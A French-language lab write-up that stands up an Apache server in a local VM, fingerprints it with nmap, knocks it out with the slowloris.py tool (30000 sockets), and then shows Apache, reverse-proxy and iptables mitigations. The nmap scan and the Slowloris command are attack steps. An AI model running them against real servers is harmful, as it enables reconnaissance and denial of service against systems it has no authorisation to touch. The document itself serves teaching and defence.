# Slow Loris

<!-- vim-markdown-toc GitLab -->

* [Setup](#setup)
* [Footprinting](#footprinting)
* [Slow Loris attack](#slow-loris-attack)
* [Prevention](#prevention)
    * [Directement dans la conf Apache](#directement-dans-la-conf-apache)
    * [Utilisation d'un ReverseProxy](#utilisation-dun-reverseproxy)
    * [Utilisation d'un firewall](#utilisation-dun-firewall)
    * [Test](#test)

<!-- vim-markdown-toc -->

## Setup

**Setup Apache webserver :**

```bash
# Go in slow_loris dir
$ cd slow_loris # this directory

# Bring up the machine
$ vagrant up
$ vagrant ssh

# From inside the VM install and start Apache Webserver
$ sudo yum install -y httpd
$ sudo systemctl enable --now httpd
```

**Test depuis l'attaquant :**

```bash
$ curl 10.100.100.11

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
		<title>Apache HTTP Server Test Page powered by CentOS</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
[...]
</head>
<body>
  <div class="jumbotron text-center">
    <div class="container">
   	  <h1>Testing 123..</h1>
  		<p class="lead">This page is used to test the proper operation of the <a href="http://apache.org">Apache HTTP server</a> after it has been installed. If you can read this page it means that this site is working properly. This server is powered by <a href="http://centos.org">CentOS</a>.</p>
		</div>
  </div>
  <div class="main">
    <div class="container">
       <div class="row">
  			<div class="col-sm-6">
    			<h2>Just visiting?</h2>
			  		<p class="lead">The website you just visited is either experiencing problems or is undergoing routine maintenance.</p>
  					<p>If you would like to let the administrators of this website know that you've seen this page instead of the page you expected, you should send them e-mail. In general, mail sent to the name "webmaster" and directed to the website's domain should reach the appropriate person.</p>
  					<p>For example, if you experienced problems while visiting www.example.com, you should send e-mail to "webmaster@example.com".</p>
	  			</div>
  				<div class="col-sm-6">
	  				<h2>Are you the Administrator?</h2>
		  			<p>You should add your website content to the directory <tt>/var/www/html/</tt>.</p>
		  			<p>To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>

	  				<h2>Promoting Apache and CentOS</h2>
			  		<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers.  Thanks for using Apache and CentOS!</p>
				  	<p><a href="http://httpd.apache.org/"><img src="images/apache_pb.gif" alt="[ Powered by Apache ]"></a> <a href="http://www.centos.org/"><img src="images/poweredby.png" alt="[ Powered by CentOS Linux ]" height="31" width="88"></a></p>
  				</div>
	  		</div>
	    </div>
		</div>
	</div>
	  <div class="footer">
      <div class="container">
        <div class="row">
          <div class="col-sm-6">          
            <h2>Important note:</h2>
            <p class="lead">The CentOS Project has nothing to do with this website or its content,
            it just provides the software that makes the website run.</p>
            
            <p>If you have issues with the content of this site, contact the owner of the domain, not the CentOS project. 
            Unless you intended to visit CentOS.org, the CentOS Project does not have anything to do with this website,
            the content or the lack of it.</p>
            <p>For example, if this website is www.example.com, you would find the owner of the example.com domain at the following WHOIS server:</p>
            <p><a href="http://www.internic.net/whois.html">http://www.internic.net/whois.html</a></p>
          </div>
          <div class="col-sm-6">
            <h2>The CentOS Project</h2>
            <p>The CentOS Linux distribution is a stable, predictable, manageable and reproduceable platform derived from 
               the sources of Red Hat Enterprise Linux (RHEL).<p>
            
            <p>Additionally to being a popular choice for web hosting, CentOS also provides a rich platform for open source communities to build upon. For more information
               please visit the <a href="http://www.centos.org/">CentOS website</a>.</p>
          </div>
        </div>
		  </div>
    </div>
  </div>
</body></html>
```

## Footprinting

```bash
# Depuis la machine attaquante
$ sudo nmap -sS -A 10.100.100.11

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-08 12:02 CEST
Nmap scan report for 10.100.100.11
Host is up (0.0027s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 b2:99:60:68:c1:c2:32:fa:39:99:af:58:4c:0c:62:cc (RSA)
|   256 b8:4a:63:a6:ea:4c:b9:5d:8b:75:23:b6:7f:f2:a3:e6 (ECDSA)
|_  256 5a:92:f2:7b:b4:d2:cf:2e:33:11:b9:f6:08:2c:e1:3b (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
|_http-title: Apache HTTP Server Test Page powered by CentOS
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
MAC Address: 08:00:27:7D:0D:50 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   2.71 ms 10.100.100.11

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.95 seconds
```

La commande `nmap` nous indique entre autres :
* on a à faire à un Linux 3.x ou 4.x (c'est en réalité un 3.10)
* au moins 3 ports sont ouverts :
  * 22/tcp : OpenSSH7.4
  * 80/tcp : Apache httpd 2.4.6
  * 111/tcp et 111/udp: rpcbind2-4
* les premiers octets de la MAC address nous indique que c'est une VM VirtualBox

## Slow Loris attack

Depuis l'attaquant, ouverture de 30000 connexionx simultanées :

```bash
$ ./slowloris.py  --host 10.100.100.11 --port 80 --max-sockets 30000
[*] creating 30000 socket connections...
```

Test, depuis une machine extérieure :
```bash
$ curl 10.100.100.11 # suuuuuper slow, response in ~2min for a simple html page. We can even timeout.

$ time curl 10.100.100.11 # super slow
real	0m25.973s
user	0m0.005s
sys	0m0.005s

$ time curl 10.100.100.11 # timeout
^C
```

Sur la machine Apache : 
```bash
$ ss -t  | wc -l
1188  # Nombre de connexionx simultanées actives
```

## Prevention

Il y a plusieurs façon de prévenir d'une attaque DoS de type Slow Loris.

### Directement dans la conf Apache

On peut utiliser deux modules Apache pour atténuer l'impact de Slow Loris :
```
<IfModule mod_reqtimeout.c>
  RequestReadTimeout header=20-40,MinRate=500 body=20-40,MinRate=500
</IfModule>

<IfModule mod_qos.c>
  # handle connections from up to 100000 different IPs
  QS_ClientEntries 100000
  # allow only 50 connections per IP
  QS_SrvMaxConnPerIP 50
  # limit the maximum number of active TCP connections to 256
  MaxClients 256
  # disables keep-alive when 180 (70%) TCP connections are occupied
  QS_SrvMaxConnClose 180
  # minimum request/response speed 
  # (deny clients that keep connections open without requesting anything)
  QS_SrvMinDataRate 150 1200
</IfModule>
```

### Utilisation d'un ReverseProxy

La mise en place d'un reverse proxy comme Varnish ou NGINX permet de protéger le site Web. En effet, Varnish et NGINX sont réputés pour fournir de très bonnes performances, ils seront donc plus à même de traiter et encaisser une attaque Slow Loris. 

De plus, il est possible d'affiner leur configuration afin de limiter le nombre de connexioxn simultanées, définir un timout lors d'une requêtes, limiter les connexionx venant d'un client donné, etc.

### Utilisation d'un firewall

Les distributions GNU/Linux viennent avec un firewall natif : `iptables` (ou `nftables` pour certains OS plus récents). Il est possible de limiter les connexions faites au serveur de façon drastique avant qu'elles atteignent le serveur Web :

```bash
sudo iptables -I INPUT \
    -p tcp --dport 80 \
    -m connlimit --connlimit-above 20 --connlimit-mask 40 \
    -j DROP
```

Cette commande permet de drop les paquets à destination du port 80 s'il y'a plus de 20 connexions venant du même client.

### Test

Une fois la configuration Apache ajustée et le firewall `iptables` configuré (pas de reverse proxy) :

```bash
$ time curl 10.100.100.11
real	0m0.055s
user	0m0.007s
sys	0m0.044s
```
